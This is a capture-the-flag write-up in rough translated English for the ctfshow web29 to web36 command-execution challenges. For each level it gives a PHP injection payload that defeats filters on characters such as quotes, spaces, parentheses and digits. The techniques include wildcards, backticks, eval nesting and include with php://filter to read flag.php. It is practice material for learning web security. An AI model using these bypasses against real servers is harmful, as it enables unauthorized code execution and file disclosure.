Ctfshow web entry command execution

web29

View directory

because flag Filtered , Wildcards can be used to bypass , see flag.php

c=system("nl fla?????");

web30

More on the basis of the previous question system and php

Use backquotes to view the table of contents And look at flag.php(flag php Filtered Using wildcards )

web31

Add a little more 、 Single quotes and spaces are filtered . We can go through shell in eval Command to nest and replace variables

c=eval($_GET[1]);&1=echo `nl flag.php `;

web32

Filtered parentheses and semicolons
%0a A newline
include Functions do not use parentheses Semicolons can be used ?> Instead of

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web 33

One more double quotation mark is filtered , use require function

c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web 34  35

Similar to the above   Just filter more symbols

c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web36

By comparison, it increases   Filter numbers

take include Parameters of 1 Change to letters ,include The bracketed inclusion of can be done without spaces

payload:?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php